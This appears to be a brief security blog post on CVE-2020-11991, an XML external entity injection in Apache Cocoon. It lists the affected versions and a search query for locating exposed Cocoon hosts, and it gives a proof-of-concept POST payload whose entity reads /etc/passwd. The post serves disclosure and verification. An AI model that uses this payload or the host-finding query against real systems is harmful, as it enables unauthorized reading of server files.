Post

Apache Cocoon Xml Injection Cve 2020 11991

Posted
By Rhy0z
1 min read
Apache Cocoon Xml Injection Cve 2020 11991

Apache Cocoon XML Injection CVE-2020-11991

Vulnerability Description

On September 11, the Apache Software Foundation issued a security announcement to fix the Apache Cocoon xml external entity injection vulnerability (CVE-2020-11991).

Apache Cocoon is a framework based on the Spring framework built around the concept of separation. All processing under this framework is linearly connected by predefined processing components, allowing inputs and generated outputs to be processed in pipeline order.

Affect Version

Apache Cocoon <= 2.1.12

Network surveying and mapping

app="Apache-Cocoon" </a-checkbox>

Vulnerability reappears

Verify POC

1
2
3
4
5
6
7
8

POST /v2/api/product/manger/getInfo 

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<userInfo>
<firstName>John</firstName> 
<lastName>&ent;</lastName>
</userInfo>
This post is licensed under CC BY 4.0 by the author.